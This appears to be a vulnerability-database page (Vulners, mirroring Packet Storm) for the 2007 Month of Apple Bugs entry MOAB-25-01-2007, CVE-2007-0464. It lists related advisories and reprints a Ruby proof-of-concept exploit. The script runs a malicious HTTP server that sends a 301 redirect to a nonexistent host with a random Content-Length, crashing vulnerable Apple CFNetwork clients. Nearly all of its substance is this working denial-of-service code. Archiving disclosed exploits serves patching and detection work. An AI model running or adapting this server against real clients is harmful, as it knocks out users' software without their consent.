Lucene search
+L

MOAB-25-01-2007.rb.txt

🗓️ 27 Jan 2007 00:00:00Reported by LMHType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 37 Views

Proof of concept for MOAB-25-01-200

Related
Code
ReporterTitlePublishedViews
Family
nessus
Tenable Nessus
CFNetwork < 129.20 DoS
22 Jun 200700:00
nessus
nessus
Tenable Nessus
Mac OS X < 10.4.11 Multiple Vulnerabilities (Security Update 2007-008)
15 Nov 200700:00
nessus
nessus
Tenable Nessus
Mac OS X < 10.4.11 Multiple Vulnerabilities (Security Update 2007-008)
14 Nov 200700:00
nessus
cve
CVE
CVE-2007-0464
30 Jan 200717:00
cve
cvelist
Cvelist
CVE-2007-0464
30 Jan 200717:00
cvelist
exploitdb
Exploit DB
Apple CFNetwork - HTTP Response Denial of Service
25 Jan 200700:00
exploitdb
nvd
NVD
CVE-2007-0464
30 Jan 200717:28
nvd
prion
Prion
Null pointer dereference
30 Jan 200717:28
prion
securityvulns
securityvulns
Mac OS X CFNetwork library DoS
29 Jan 200700:00
securityvulns
seebug
seebug.org
Apple CFNetwork HTTP空指针引用拒绝服务漏洞
17 Nov 200700:00
seebug
Rows per page
`#!/usr/bin/ruby  
# (c) Copyright 2007 Lance M. Havok <lmh [at] info-pull.com>  
# Proof of concept for MOAB-25-01-2007.  
#  
  
require 'socket'  
  
web_port = (ARGV[0] || 80).to_i  
  
puts "++ Starting HTTP server at port #{web_port}."  
web_server = TCPServer.new(nil, web_port)  
while (session = web_server.accept)  
rand_clen = rand(80)  
useragent = session.recvfrom(2000)[0].scan(/User-Agent: (.*)/).flatten[0].chomp!  
puts "++ Connected: #{useragent}"  
session.print "HTTP/1.1 301 OK\r\n"  
session.print "Content-Type: text/html\r\n"  
session.print "Content-Length: #{rand_clen}\r\n"  
session.print "Location: http://nonexistent123\r\n\r\n"  
session.print "X" * rand_clen  
session.close  
end  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Jan 2007 00:00Current
7.7High risk
Vulners AI Score7.7
EPSS0.14382
37